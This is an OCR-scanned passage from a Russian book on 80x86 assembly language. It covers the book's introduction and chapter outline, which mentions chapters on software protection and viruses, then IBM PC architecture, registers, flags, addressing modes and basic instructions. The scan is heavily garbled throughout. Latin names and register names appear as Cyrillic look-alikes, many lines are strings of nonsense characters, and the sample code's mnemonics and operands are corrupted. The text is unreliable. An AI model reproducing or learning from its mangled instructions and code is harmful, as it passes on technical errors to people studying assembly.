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Введение 


В данной книге рассмотрен язык Ассемблера для процессоров семейства ше! 80х86 
а также различные аспекты применения этого языка в области защиты информации 
"Вообще плохих" языков программирования очень мало. Языков же "вообще хо " 
нет совсем. Любой язык программирования разрабатывается под определенный спек 
залач, и вне этого спектра может быть назван "плохим". Это нужно помнить, чтобы не аа, 
дать в бессмысленные споры на тему "Что лучше — Разса! или С?" (где ачас ю подм ня, 
ется тема и начинается сравнение качества двух конкретных компиляторов) В ие рии 
программирования были попытки создать "вообще хороший" язык, одинаково  примени. 
мы аня побых задач, но в результате получались монстры огромной 
ры ии языков (самый известный из них — Р1.//1) в полном объеме 
для одного человека. 
. перечислим спектр задач, которые лучше всего решать на Ассемблере: 
ни ы ры требующие минимального размера и максимального быстродействия; 
ще все, что напрямую работает с аппаратурой; 


и ядра ОС серверы |9) [ И вооб е системные прог аммы работаю ие вза ищенном 
° М щ 


Прот раммы Т Т Т ТТ 
ДЛЯ защиты информации, взлома этои защиты и защиты о аких взломов 


Списо 

к на с 

и амом деле не исчерпан. На Ассемблере (или на языке высокого уровня, но 
ы 

на и мблерны МИ вставками} можно писать многие программы, которые обычно пишутся 


голом" язы 
мы ке высокого уровня с неизбежным проигрышем в 


и компактности кода. онстролействии програм 


чем ж 
ачь © заключаются достоинства и недостатки Ассемблера? 
М с достоинств. 


Пре 
Жде всего 
— эт [92 
Итера и О о максимальная гибкость и максимальный доступ к ресурсам ком- 


. На Ассембле 
е мож й 
т Роще, чем нь я °р но сделать с машиной все что угодно, и зачастую 
 ращених т ысокого уровня (ЯВУ), где приходится использовать различные 
оемблере и пример, если мы пишем драйвер или резидентную программу, то на 
легко и просто оставляем в памяти только то, что нам понадобится После 


ИЦиализа 
ЦИИ р 
про 
граммы. Объем же в ОП аналогичных резиден ов, Написанных на 
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языке высокого уровня, больше в 4...10 раз! И дело тут не в размере скомпилированного 
кода — просто в памяти остается очень много уже ненужного. 

Затем — компактность выходного кода и возможности его ручной оптимизации, огра- 
ниченные лишь возможностями процессора. Часто звучащие в последнее время заявлс- 
ния типа "наш компилятор оптимизует код лучше, чем программист-ассемблерщь 
вручную" чаще всего, очевидно, являются лишь рекламной обманкой. Чтобы убедить 
в этом, достаточно сравнить размер кода выходных программ с аналогами, написанным, 
на Ассемблере. Кроме того, ассемблерные вставки и ручная оптимизация исходных м, 
дулей позволяют улучшить скорость выполнения программ, разрабатываемых, напр, 
мер, в среде \Макот С/С++ — а это действительно один из лучших оптимизующих ко! 
пиляторов с языка высокого уровня. 

Рассмотрим теперь недостатки языка — реальные и мнимые. 


Трудоемкость разработки. Действительно, трудоемкость разработки программ на 
Ассемблере в несколько раз выше, чем на языках высокого уровня. Там, где на ЯВУ 
записывается одна строчка (чтобы, например, присвоить переменной значение выраже- 
ния), на Ассемблере приходится писать несколько (а иногда и десятки — смотря какое 
выражение). Но на практике неопытные программисты-ассемблерщики сплошь и рядом 
затрудняют себе работу еще во много раз, реализуя заново в каждой программе одни 
и те же алгоритмы, например, ввода/вывода, вместо того, чтобы реализовать их в виде 
макросов во включаемом файле или подпрограмм в линкуемой библиотеке. Кроме того, 
есть и готовые библиотеки, но они не стандартизованы и вместе с компиляторами не 


распространяются. Отсюда и миф о "трудоемкой до невозможности" разработке про- 
грамм на Ассемблере. 


Трудность понимания исходных текстов несколько выше, чем для исходных текстов 
на языках высокого уровня, но в меньшее число раз, чем даже соотношение числа строчек 
исходных текстов. Запутать до невозможности понимания можно любую программу, неза- 
висимо от языка, на котором она написана. Или же дело в том, что человек, взявшийся чи- 
тать исходные тексты на Ассемблере, толком его не знает. Если знать язык и читать исход- 
ный текст, не подвергнутый умышленному запутыванию, понять программу сложнее, чем 
написанную на ЯВУ, но не настолько, чтобы отказываться от Ассемблера там, где он дей- 
ствительно нужен. 

Разговоры о трудности отладки программы, написанной на Ассемблере, являются 
просто ложью. Более трудоемко, более канительно — возможно, но далеко не всегда. 
На самом деле все обстоит с точностью до наоборот - знание Ассемблера полезно для 
отладки программ, написанных на языках высокого уровня (особенно при вылавливаний 
"крученых" багов, когда исходный текст программы на ЯВУ выглядит вполне правил” 
но), и для ручной оптимизации таких программ. 


й 
Непереносимость. Программы на Ассемблере действительно не переносятся с одне 
аппаратной платформы на другую. И не должны! На то и Ассемблер, чтобы создав, 
программу под конкретную аппаратную платформу, добиваясь максимально возможног9 
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качества работы. Кроме того, современные среды разработки на ЯВУ сплошь и рядом не 
гарантируют переносимость не только между аппаратными платформами, 
но и между ОС, потому что для улучшения эффективности программирования и выход- 
ного кода в язык вносятся системно-зависимые расширения под конкретную ОС. Про- 
гамма, использующая эти расширения, очевидно, сразу же теряет переносимость. 


Теперь о содержании книги. 

В главе | описан сам язык Ассемблер 80х86. Рассмотрена архитектура компьютера, 
система команд, способы адресации данных, системные функции ввода-вывода, работы 
с файлами, некоторые приемы программирования. В главе 2 рассмотрены всевозможные 
аспекты решения задач криптографической защиты информации. Глава 3 целиком по- 
священа специфическим применениям Ассемблера в области защиты информации и ин- 
формационной безопасности. Рассмотрены методы и приемы борьбы с „различными 
средствами исследования программ, затронута борьба с вирусами, "изощренное" про- 
праммирование. Глава 4 содержит описание особенностей программирования на Ас- 
семблере в среде 1лпих. В главе 5 обсуждаются инструментальные средства и базовые 
приемы создания приложений для ОС \Ип4о\5. В главе 6 описывается методика опти- 
мизации программ на языке Ассемблер с учетом особенностей архитектур процессоров 
РепНит различных поколений. 


Все программы из первой главы работают на любом 1ВМ-совместимом компьютере 
с процессором х86 или Репнит. 


Необходимое программное обеспечение: 
# Тиго АззетЫег 3.2 или выше; 
® Тофо Оебиввег 3.2 или выше; 
® М5 0$ 4.01 или выше. 


Список используемых сокращений 


ВВ - ввод-вывод (информации) 
ИБ - интерфейсный блок 
КПр - контроллер прерываний 
МК - микроконтроллер 
ОС - операционная система 
- пристыковочный модуль 
ПСП - псевдослучайная последовательность 
В - устройство ввода-вывода 
эк- электронный ключ 


ВП - вектор прерывания 

БИС - большая интегральная схема 
КС - контрольная сумма 

МП - микропроцессор 

ПК - персональный компьютер 

ПО - программное обеспечение 
ТВП - таблица векторов прерываний 
ЦН - центральный процессор 

ЯВУ - язык высокого уровня 
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Рис. ВЛ. УГО: 


а- двухвходовой элемент сложения по модулю два (ХОК); 

б — трехвходовой элемент сложения по модулю два; 

в — п-входовой элемент сложения по модулю два; 

г — п-входовой сумматор по модулю 2п; 

ч- т ехоловой Сумматор, е 7 одной перенос (Сагту при, СКО - выходной перенос (Сагу 
Ошщриф; . т 
е - простейший элемент памяти (О-—триггер}, выполняющий функцию задержки на один т 


1 





Глава 1 
Основы программирования 
на Ассемблере ВМ РС 


1.1. Архитектура ВМ РС 


1.1.1. —_ Структурная схема ВМ РС 


На рис. 1.1.1 показана упрощенная структурная схема персонального компьютера 
типа 1ВМ РС. Центральный процессор (ЦП) совместно с блоком памяти обеспечивает 
выполнение программ. Связь между процессором и памятью осуществляется через сис- 
темную магистраль, которую образуют 3 шины: данных, адреса и управления. Управле- 
ние операциями записи и чтения из памяти осуществляется сигналами МЕМИ’ (Метогу 


Уще) и МЕМЕ (Метогу Кеа4) шины управления. Устройства ввода-вывода (УВВ) 
обеспечивают связь с "внешним миром", выполняя функции ввода, вывода и отображе- 
ния информации (клавиатура, монитор, принтер, мышь и др.), обеспечивают долговре- 
менное хранение программ и данных (накопители на магнитных дисках). Взаимодейст- 
вие с УВВ также осуществляется через системную магистраль. УВВ подключаются 
ксистемной магистрали через интерфейсные блоки (ИБ) или адаптеры, каждый из ко- 
торых имеет в своем составе набор устройств (чаще всего это регистры), называемых 
портами ввода-вывода (ВВ), через которые ЦП и память взаимодействуют с УВВ. 
Адресное пространство памяти и портов ВВ является совмещенным, поэтому управ- 
ление ` операциями записи и чтения из портов ВВ осуществляется специальными сигна- 


пами ГО ( при/Ошри \Мтие) и ОЕ (три/Ошри Веа4) шины управления. 
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Запрос на прерывание 1807 


Рис. 1.1.1. Структурная схема 1ВМ РС с точки зрения программиста 


1.1.2. Структура центрального процессора 


В качестве ЦИ используется микропроцессоры (МП) фирмы Ние!. МН ие! 8086 
(рис. 1.1.2) имеет 16-разрядную внутреннюю архитектуру: именно такова разряднос"" 
шины данных и всех регистров, в которых хранятся данные и адреса. Шина адреса имее 
разрядность 20, что соответствует объему адресного пространства 27° = 1 Мбайт. ди 
того чтобы с помошью 16-разрядных регистров можно было обращаться в любую точ^ 
адресного пространства, в МП предусмотрена так называемая сегментная адреса! ` 
реализуемая с помощью четырех сегментных регистров (рис. 1.1.3) 


Глава 1. Основы программирования на Ассемблере 1ВМ РС 
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1-й операнд — 2-й операнд Указатель команд Регистр флагов 


15 0 15 


результат 


Рис. 1.1.2. Структура процессора 8086 


Сегмент команд 
(сегмент кода) 
Сегмент данных 
Сегмент стека 


Рис. 1.1.3. Сегментная адресация 















Смещение в сегменте кода ТР 
(5: 1Р 








(Смещение в сегменте данных $1, ОТ, ОХ, ВХ 





(Смещение в сегменте стека $Р, ВР 





Сегментные регистры Регистры-указатели 


15 0 
я 


со СПОлНительный 20-разрядный адрес любой ячейки памяти вычисляется ЦИ путем 
очей ния начального адреса области памяти (сегмента памяти), в которой находится эта 
м в со смещением (оЁе() в ней (в байтах) от начала сегмента. Размер сегмента мо- 
аходиться в пределах 0 байт — 64 Кбайт. Начальный адрес сегмента памяти обычно 
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называют сегментным адресом, смещение в сегменте памяти — относительным адре- 
сом. Сегментный адрес без 4 младших нулевых битов, т.е. деленный на 16, хранитс.. 
в одном из сегментных регистров. При вычислении исполнительного адреса ЦП умножа. 
ет содержимое сегментного адреса на 16 и прибавляет к полученному 20-разрядном` 
коду 16-разрядное содержимое регистра, в котором хранится относительный адрес 
Таким образом, полный адрес ячейки памяти может быть записан в виде $5551: ОООО1 
где $5551 — сегментный, а ООООВ - относительный адрес ячейки в шестнадцатерично! 
форме записи. Сегменты жестко не привязываются к определенным адресам памят 
и могут частично или полностью перекрываться. Участок памяти размером 16 байт на- 
зывается параграфом. Адрес начала сегмента всегда выровнен на границу параграфа. 
Например, 20-разрядный шестнадцатеричный адрес 01510. может быть представлен 
в виде двух 16-разрядных слов следующим образом: 0150: 00101, 01001: 05101 ит. п. 
Если рассматривать только режим реальной адресации памяти, или просто реальный 


режим, внутренняя архитектура МП фирмы Пие| практически совпадает. Рассмотрим } 


структуру МП семейства Пие] на примере процессора 8086. 


Процессор 8086 содержит двенадцать программно-доступных 16-разрядных регист- 
ров, а также указатель команд и регистр флагов (признаков). 


Сегментные регистры С$ (со4е зевтеп®, 0$ (4ава зеотеп®, ЕЗ (епрапсе4 зеотеп!) 
и55 (эаск зевтепе) обеспечивают адресацию четырех сегментов (соответственно сег- 
- мента кода, сегментов данных, основного и дополнительного, а также сегмента стека). 


Регистры общего назначения (РОН) АХ, ВХ, СХ и ОХ используются для хранения 
данных или адресов, результатов выполнения логических или арифметических операций 
Эти регистры допускают независимое обращение к своим старшим (АН, ВН, СН, ОН: 
или младшим (А!., В1., С1., ОГ.) половинам. При выборе РОН предпочтение всегда сле- 
дует отдавать регистру АХ (или его половинам АН и АГ), так как многие команды вы 
полняются в этом случае быстрее и занимают меньше места в памяти. Некоторые коман 
ды используют РОН неявным образом. Так, например, команды циклов используют С» 
в качестве счетчика циклов; команды умножения и деления в качестве операндов ис- 
пользуют содержимое АХ и ОХ; команды ввода-вывода в качестве буферных регистров 
могут использовать только АХ или А, а в качестве регистра адреса ОХ ит. д. 


Основное назначение регистров $1 (Зошгсе ш4ех) и ОТ (РезипаНоп ш4ех) хранить 
индексы (смещения) относительно некоторых базовых адресов массивов при выборке опе- 
рандов из памяти. Адрес базы при этом может находиться в регистре ВР или ВХ. Специ- 
альные строковые команды не явным образом используют регистры ЗГ и Г! в качестве уКа` 


зателей в обрабатываемых строках. При необходимости оба индексных регистра могУТ 
использоваться в качестве РОН. 
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Регистр ВР (Вазе Ройцег) служит указателем базы при работе со стеком, но может 
пользоваться и в качестве РОН. Регистр $Р (ЗасК Ропиег) используется как указатель 
ис 
вершины стека при выполнении команд, работающих со стеком. 


Стек — это область памяти, организованная таким образом, что 16-разрядные данные 
загружаются в нее последовательно, а при считывании извлекаются в обратном порядке. 
Стек заполняется снизу вверх, а извлечение содержимого стека производится сверху 
(с вершины стека) в порядке очередности. В результате стек можно назвать ЕП. О-памятью, 
работающей по принципу "первым вошел, последним вышел" — "Вгё ш, 1а5ё ош". Для 
обычно организованной памяти (памяти с произвольным доступом) при вводе и выводе 
данных необходимо указывать адреса ячеек, к которым происходит обращение. Для стека 
достаточно простых команд "поместить в стек" и "извлечь из стека". Стек используется для 
временного хранения данных, для передачи параметров вызываемым подпрограммам, для 
сохранения адресов возврата при вызове подпрограмм и обработчиков прерываний. 

Указатель команд ГР (шягисйоп Ропиег) выполняет функцию программного счет- 
чика, его содержимое является относительным адресом команды, следующей за испол- 
няемой. Регистр 1Р программно недоступен. Наращивание адреса в нем осуществляет 
ЦП с учетом длины текущей команды. Команды передачи управления изменяют содер- 
жимое ТР, обеспечивая тем самым переход в нужные точки программы (рис. 1.1.4). 

Регистр флагов Е содержит информацию о состоянии ЦП. Одни флаги устанавли- 
ваются автоматически после выполнения арифметических и логических команд в ариф- 
метико-логическом устройстве и являются по сути признаками результата выполняемой 
команды; другие, так называемые флаги управления, могут быть установлены или сбро- 
щены только специальными командами. 

Признаки результата: 


$ ($1еп) - знак результата, равен старшему биту результата операции; 
2. (2его) - признак нулевого результата; 
Р (Рагу) -— признак четности результата; 
С (Сапу) — флаг переноса; устанавливается, если при сложении (вычитании) возникает 
перенос (заем) из старшего разряда результата; при сдвигах СЕ хранит значение выдви- 
гаемого бита; служит индикатором ошибки при обращении к системным функциям; 
А (АихШагу) — флаг дополнительного переноса; устанавливается, если возникает 
перенос (заем) из третьего бита в четвертый; используется в операциях над упакован- 
м бими двоично-десятичными цифрами; 

(ОуегЯо\,) — флаг переполнения; устанавливается при получении результата, нахо- 

дящегося за пределами допустимого диапазона значений. 
м Вы Управления: | 
Е —тесНоп) — флаг направления; определяет направление обработки строк данных; 
с ` Движение от младших адресов к старшим, содержимое индексных регистров 
Обработки каждого элемента строки увеличивается; ОЕ = | — движение 
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от старших адресов к младшим, содержимое индексных регистров после обработки 
каждого элемента строки уменьшается; 

в 1 ((щетаро — флаг прерывания; устанавливается, когда надо разрешить ЦП обрабаты- 
вать запросы прерываний от УВВ; 


й Т (Тгар) — флаг трассировки; при ТЕ = 1 после выполнения каждой команды генери- : 


руется внутреннее прерывание процессора; используется отладчиками. 






(5: 1Р - адрес первой 
команды программы 







Чтение из памяти команды, 
адрес которой находится в [Р 


Команда перехода? 





Выполнение команды 





Условный переход? 











Условние 
выполняется? 


Запись в [Р адреса перехода орнирование адреса 


Рис. 1.1.4. Послецовательность выполнения команд 


Программа всегда располагается в сегменте, определяемом регистром С$. Значение 
С$ определяется операционной системой автоматически. Область данных по умолчанию 
находится в сегменте, определяемом регистром 0$. Она может находиться и в одном 3 
сегментов, адресуемых регистрами С$, ЕЗ или $$, однако этот факт должен быть отра- 
жен в программе наличием префикса замены сегмента, например: 


С$: НазЕпаЫе — содержимое ячейки памяти Е!азЕпаЫе, находящейся в сегменте кода; 


- . те 
ЕЗ: [ВХ - 2] - содержимое ячейки памяти, расположенной в дополнительном сегмен 
данных, при этом ее относительный адрес равен содержимому ВХ, уменьшенному На = 


р по 
Область данных, обращение к которой осуществляется с помощью ВР, находито” 
умолчанию в сегменте стека. Она может находиться и в другом сегменте, однако 7 
факт должен быть отражен наличием префикса замены сегмента. 
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1.1.3. Система команд 


Формат команды. Код команды разделяется на группы бит или поля, причем един- 
ственное обязательное поле — поле кода операции (КОП) определяет, что должен делать 
пронессор, а остальные поля идентифицируют требуемую команде информацию. 


Длина в байтах, 
возможные значения 0 или 1 1 били 1 


повторение команды, замена 
сегмента, выполнение 
определенного условия 


0,1 или2 0,1 или2 


; Адрес 


режим адресации, 
используемые регистры, 
расширение КОП 





Рис. 1.1.5. Общий формат команцы 


Режимы адресации данных. Различают следующие режимы адресации данных: 


Ш непосредственный — данное длиной 8 или 16 бит является частью команды: 

[2 Га м ’ 
Ш прямой - 16-разрядный исполнительный адрес данного является частью команды: 
" 3 


Регистровый — 8- или 16-разрядное данное находится в оп 
соответственно 8-разрядном или 16-разрядном регистре; 


регистровый косвенный — исполнительный 
из регистров ВХ, $1, 01 


(ВХ) 
ВА=} ($1) 
(р 


Регистровый относительный — и 
о 
ного из регистров ВР, ВХ, $1, п 


ределяемом командой 


(эффективный) адрес ЕА находится в одном 


э 


сполнительный адрес равен сумме содержимого 
и 8- или 16-разрядного смещения 


(ВР) 
ЕА=/(ВХ)| [8- разрядное смещение 
($0 16 - разрядное смещение 
. (ОП) 
базовый и 
нд и — й 
вых т егистр ов Вр В уесполнительный адрес равен сумме содержимого одного из базо- 


и одного из индексных регистров $1, 01 


ВА=)(ВР)] |310]. 
(ВХ)) |(ро’ 
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м относительный базовый индексный — исполнительный адрес равен сумме содержи. 


мого одного из базовых регистров ВР, ВХ, одного из индексных регистров $1, ОГ и $. 
или 16-разрядного смещения 


А- (ВР) + (51) + 8 — разрядное смещение 
(ВХ) (рр 16 — разрядное смещение | ^ 

Режимы адресации переходов. Различают следующие режимы адресации переходов: 
Ш внутрисегментный прямой — исполнительный адрес перехода равен сумме текущего 

содержимого указателя команд [Р и 8- или 16-разрядного смешения; допустим в коман- 
дах условного и безусловного переходов, но в первом случае может использоваться 
только 8-разрядное смещение; 
внутрисегментный косвенный — исполнительный адрес перехода суть содержимое 
регистра или ячейки памяти, которые указываются в любом режиме (кроме непосред- 
ственного) адресации данных; содержимое 1Р заменяется исполнительным адресом 
перехода; допустим только в командах безусловного перехода; 
Ш межсегментный прямой — заменяет содержимое [Р одной частью, а содержимое С$ 

другой частью команды; 
Ш межсегмёнтный косвенный — заменяет содержимое ПР и С$ содержимым двух смеж- 


ных 16-разрядных ячеек памяти, которые определяются в любом режиме адресации 
данных, кроме непосредственного и регистрового. 


Межсегментный переход может быть только безусловным. 


Пустая команда МОР (№ орегайоп) 


По команде МОР процессор не выполняет никаких операций, происходит лишь инкре- 
мент указателя команд — регистра 1Р. 


Команды передачи данных — МОУ, ГАНЕ, 1.05, ГЕА, Г.ЕЗ, ЗАНЕ, 
ХСНС, ХГАТ 


МОУ 1-0 операнод, 2-й опера 


Пересылка данных (Мое) 

Команда замещает первый операнд (приемник) вторым (источником). Исходное зна` 

чение приемника теряется. В качестве источника могут использоваться непосредствен” 

ный операнд (число), регистр или операнд, находящийся в памяти (переменная). В каче“ 

стве приемника — регистр (кроме С$) или ячейка памяти. Оба операнда должны иметь 

одинаковую разрядность. Нельзя выполнять пересылку из ячейки памяти в ячейку памЯ” 
ти, а также загрузку сегментного регистра непосредственным значением. 
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Команда меняет местами содержимое двух операндов. В качестве операндов можно 
ывать регистр (кроме сегментного) или ячейку памяти, при этом не допускается оба 
р анда одновременно определять как ячейки памяти. 
оп 


ЖЕАТ.. 


низзя оо ван ния вынесение вии явь иене ини них чизячечинеь .. 


Табличная трансляция 
Команда заменяет содержимое АГ, байтом из таблицы (максимальный размер таблицы — 25 


байтов), начальный адрес которой равен 05: ВХ. Содержимое АГ. рассматривается как смеще 
ние в таблице из соответствующей ячейки таблицы извлекается байт и помещается в АГ. 
ы 


Команда загружает в регистр {кроме сегментного), указанный в качестве первог 
операнда. относительный адрес ячейки памяти, указанной в качестве второго операнда. 
ь 


Примеры 
;==== Данные эЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕЕЕЕЕЕЕЕЕНЕЕЕНЕНЕННЯНЯНЫЯНН==== 
Маз ОВ 26, 77, (22 - 5)/2, 19, 0 
; Массив байтов 
№512е 200 $ - Маз ; Размер массива Маз, М512е =5 
Мел И 35028 ; 16-разрядная ячейка памяти 
ВЕ ОВ 10 БР (?)} ; Буфер объемом 10 байт, 
; содержимое буфера не определено 
Мах = 2 ; Уах = 2 
}==== Команды КЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕВЕЕЕЕЕЕНЕЕНЕЕЕЕЕНЕНЕННЕЕННЕЯЯЯНЯ 
оу ах, Маз512е ; АХ ро р я 
; АХ и ячейка Мем обмениваю 
тя тк Мет ; содержимым, Мет = 5, АХ = 3502 
ет 41, ОРЕЗЕТ ВаЕ ; Запись в $1 относительного 
; адреса буфера ВчЁ 
поу [91], а1 ; Пересылка байта из АЁ 
; в 8-разрядную ячейку памяти 
; с адресом 0$: ОТ, ВуЕ[0] = 2 
по 91, 3 ; Запись в 01 десятичного числа 3, 
01 =3 
ПоУ рх, 41 ; Пересылка слова из ОТ в ВХ, ВХ = 3 
по 91, Маз [2х] ; Пересылка в ОЪ элемента Массива 
; Маз, индекс которого находится в 
; ВХ, В = 19 
1еа рх, Маз ; Запись в ВХ относительного 


; адреса массива Маз 
оу ап, ([Ъх + 91] ; Запись в АН содержимого ячейки 
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Уаг 


; 1) 


2 


; 4) 


55 


; 6) 
#7) 


; 8) 














; памяти, относительный адрес 


; которой равен сумме содержимого 


; ВХи ПТ, АН = Маз[3] = 19 
ем МОВР РТВ Мею, 26 ; Запись в ячейку Мет 


; десятичного числа 26 
по ВУТЕ РТВ [5х + 91 +1], 268 


; Запись в ячейку Маз[4] 


; шестнадцатеричного числа 268 
= 3 


оу а1, Уаг А =3 
х1ае ; Чтение содержимого 
; массива ячейки Маз[3], АГ 


; Примечания. 


После точки с запятой приведены комментарии. Действие 
комментария прекращается в конце строки. Комментарии 

в процессе трансляции игнорируются. 

Система счисления, в которой записано число, определяется 
буквой, указанной после его значения: Ь - двоичное, 

В - шестнадцатеричное, при отсутствии буквы число 

считается десятичным. 

Везде, где в операторах можно указать константу, можно 
использовать и константные выражения с использованием 
арифметических, логических, атрибутных операций и операций 
отношения. Константные выражения вычисляются во время 
трансляции исходного текста. 

Выделение памяти для данных различной длины обеспечивается 
с помощью директив ОВ (БеЁ1пе Вуее), ПМ (БеЁ1пе Иога), 

Ор (БеЁте Робр1е), БОР (Рар11са®е). Возможно использование 
директив совместно с выражениями, метками команд и 
идентификаторами ячеек памяти, В последних двух случаях в 
процессе трансляции формируется смещение метки или 
идентификатора относительно начала того сегмента, в котором 
они определены. 

Для определения констант применяется знак равенства и 
директива ЕОО (Ечпа1). В первом случае значения констант 
можно изменять. Знак равенства может использоваться только 
для определения констант и константных выражений 
арифметического типа. Директива ЕО может использоваться для 
определения константных выражений любого типа. 

$ - значение счетчика текущего адреса. 

Запись АБ в четвертой команде означает, что данные размещены 
в регистре АГ, запись (0Т] означает, что данные расположены 
в ячейке памяти, относительный адрес которой находится в П1. 
Если бы последние две команды имели вид поу Меш, 26 и 
моу [2х + 91 + 1], 261, было бы неясно, какую разрядность 
имеют пересылаемые данные, поэтому при пересылке байта мы 
записываем команду с указателем ВУТЕ РТК (розпёеа ру), 

а при пересылке слова - с указателем МОВО РТВ. 
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1. О 


1Е5 1-й операнд, 2—@ операнд 


спины ня чения кет чет чи оон интныя о 


Загрузка указателя с использованием ЕЗ 


иен учиевицныя чизесонитьь ивы нии линия и жиет ем чл инт 


а считывает из ячейки памяти, указанной в качестве второго операнда, двойное 
Ко азряда), являющееся указателем (полным адресом ячейки памяти), и загружает 

2 Е г 
слово ( Р половину указателя, т. е. относительный адрес, в регистр, указанный в качестве 


го операнда, а старшую половину указателя, т. е. сегментный адрес, в Е$. 
перво 


10$ 1-й операнд, 2—@ операнд 


зколаннчи ноте инея во каво зав чево воняино о 
заллинии зо викиьььчьек звзвньклиоаьвоььвленыя 


Команда считывает из ячейки памяти, указанной в качестве второго операнда, двойное 
32 разряда), являющееся указателем (полным адресом ячейки памяти), и загруж 
слово половину указателя, т. е. относительный адрес, в регистр, указанный в качестве 
мото операнда, а старшую половину указателя, т. ©. сегментный адрес, в 05. 


канзьииники .. 
нива к каикиякикии хи ииииккиниии 
кзкивижии вия икон вики ииикииниккиккииниих Жкккии 
кикаманинаюькиья 


Загрузка младшей половины регистра флагов 
в АН (1.024 АН \ИВ Па25) 


Команда копирует флаги ЗЕ, Е, АЕ, РЕ и СЕ соответственно в разряды 7, 6, 4,2 и о 
АН. Значение других битов не определено. 


жккивовинна кони нииянии ии ккия киазииияяяиааиинииик келаячань 


Запись содержимого АН в младшую половину регистра флагов (Зюге м 
295 
Команда загружает флаги ЗЕ, 7Е, АЕ, РЕ и СЕ значениями, установленными соответ- 
ственно в разрядах 7, 6, 4, 2 иб АН. 


Арифметические команды (двоичная арифметика) - АО, АРС, 
СВУ, СМР, СУ, БЕС, ОГУ, ПТУ, МОГ, МС, МОТ, МЕС, 5ВВ, ЗОВ. 


анкная .. 
закккинии иж кие и вино какие 
.* + * ирония я ина ники ина окон ния кииии мии кии ира кии ииянних жкнхя 


Сложение (А99 


Команда выполняет арифметическое сложение первого и второго операндов, исход- 
н0е содержимое первого операнда заменяется суммой. В качестве первого операнда 
Можно использовать регистр (кроме сегментного) или ячейку памяти, в качестве второго 
` Регистр (кроме сегментного), ячейку памяти или непосредственное значение, при этом 
не допускается оба операнда одновременно определять как ячейки памяти. 


АБО 1-0 операнод, 2—6 опернд 
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звиооваасасан зоашиноониино нь о о о о оно о о чан аваросоиии и оси ь орви нос оо па сан киа сов нави нь р ов рааесе зоосовонииовионииие поооваооонновьььаь о 


АОС 1-0 операнд, 2-—@ операнд 


Сложение с переносом (АЗЯ чип саггу) 

Команда выполняет арифметическое сложение первого и второго операндов, прибавля. 

ет к результату значение флага СЕ и заменяет исходное содержимое первого операнда 
полученной суммой. В качестве первого операнда можно использовать регистр (кроме 
сегментного) или ячейку памяти, в качестве второго — регистр (кроме сегментного), ячейк\ 
памяти или непосредственное значение, при этом не допускается оба операнда одновре- 


° метно определять как ячейки памяти. Используется для сложения 32-разрядных чисел. 


МС операнд 


экяньивьенниния чукьля кич я навчя чаи чик выл ня ч Чун ини мис овечки ни в пикь копии жи ни хи ил цуккини ов рее чу ции и учесть 


Инкремент (увеличение на 1) (тсгетеп 
Команда прибавляет | к операнду, в качестве которого можно использовать регистр (кро- 
ме сегментного) или ячейку памяти. Флаг СЕ при выполнении этой команды не затрагивается. 


ЗВ 1-й операнд, 2-й операнд 


Вычитание (Зи {гас!) 

Команда вычитает второй операнд из первого, исходное содержимое первого операн- 

да заменяется разностью. В качестве первого операнда можно использовать регистр 

(кроме сегментного) или ячейку памяти, в качестве второго -- регистр (кроме сегментно- 

го), ячейку памяти или непосредственное значение, при этом не допускается оба онеран: 
да одновременно определять как ячейки памяти. 


УВВ 1-й операнд, 2-б операнд 


орки анни коньки кана о ркаки зи ниникк о коль кл ов алия ия ль а вв ывиьолая во новьня киян Чань номе е зона» 


Вычитание с заемом (би БегасЕ мн Богго\) 

Команда вычитает второй операнд из первого, из полученной разности вычитается значение 

флага СЕ, исходное содержимое первого операнда заменяется полученным результатом. В каче 

стве первого операнда можно использовать регистр {кроме сегментного) или ячейку памяти 

в качестве второго — регистр (кроме сегментного), ячейку памяти или непосредственное значе 
ние, при этом не допускается оба операнда одновременно определять как ячейки памяти. 


СМР 1-й операнд, 2-й операнд 
Сравнение (Сотра!®) 

Команда вычитает второй операнд из первого, при этом в соответствии с результато* 
устанавливаются флаги. Сами операнды не изменяются. В качестве первого операнй8 
можно использовать регистр (кроме сегментного) или ячейку памяти, в качестве второго 
— регистр (кроме сегментного), ячейку памяти или непосредственное значение, при это 
не допускается оба операнда одновременно определять как ячейки памяти. Обычи 
после команды сравнения в программе стоит команда условного перехода. 
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Декремент (уменьшение на 1) (Бесгетеп() 
Команда вычитает 1 из операнда, в качестве которого можно использовать регистр (кроме 
се гментного) или ячейку памяти. Флаг СЕ при выполнении этой команды не затрагивается. 


моЕ операнд 


казино яко мия зи наииики казка вания ны аи о о нии кии нии ники ива ки ких анна хи именкжяноки аари нии ри зо дни ке роз о ниже ники 


Умножение целых беззнаковых чисел (Опзрпей ши ру) 


Команда умножает число, находящееся в А]. (в случае умножения на байт) или АХ 
(в случае умножения на слово), на операнд. В качестве операнда можно использовать 
РОН или ячейку памяти. Размер произведения в два раза больше размера сомножителей. 
При размере сомножителей, равном байту, произведение записывается в АХ, при разме- 
ре сомножителей, равном слову, произведенне записывается в ОХ: АХ. 


1МУЕ операнд 


илекекечаненане зуиню низов око нина инь ыыы иная ия ноя оков кина о они вич ков ос винь ны нонняье в яо ники вр рр ризль я оп еана ничей 


Умножение целых знаковых чисел (пед ицерег шир у) 

Команда умножает число, находящееся в АГ. (в случае умножения на байт) или АХ 

(в случае умножения на слово), на операнд. В качестве операнда можно использовать 

РОН или ячейку памяти. Размер произведения в два раза больше размера сомножителей. 

При размере сомножителей, равном байту, произведение записывается в АХ, при разме- 
ре сомножителей, равном слову, произведение записывается в ОХ: АХ. 


оу операнд 


хе нныы Кина мя иконке у зая ьччи ия вуки вк ин ининны 4 оо охвивев ню ниж иви ини ии ниче че учения чик нии ии пы вине нию яыьльвилых 


Деление целых беззнаковых чисел (Опзурпед @м14е) 

Команда делит число, находящееся в АХ (в случае деления на байт) или ОХ: АХ 

(в случае деления на слово), на операнд. В качестве операнда можно использовать РОН 
или ячейку памяти. Размер делимого в два раза больше размеров делителя, частного 
АН При размере операнда, равном байту, частное записывается в АГ, а остаток — 
‚ При размере операнла, равном слову, частное записывается в АХ, а остаток - в ОХ. 


ОУ операна 





к Деление целых знаковых чисел (51опед ниерег Ф4у9е) 
час ей полит число, находящееся в АХ (в случае деления на байт) или ОХ: АХ (в слу- 
ячейку амят олово) на операнд. В качестве операнда можно использовать РОН или 
При  азмере о мер делимого в два раза больше размеров делителя, частного и остатка. 
при размере о ожителей, равном байту, частное записывается в А]., а остаток — в АН, 
жителей, равном слову, частное записывается в АХ, а остаток — в ОХ. 
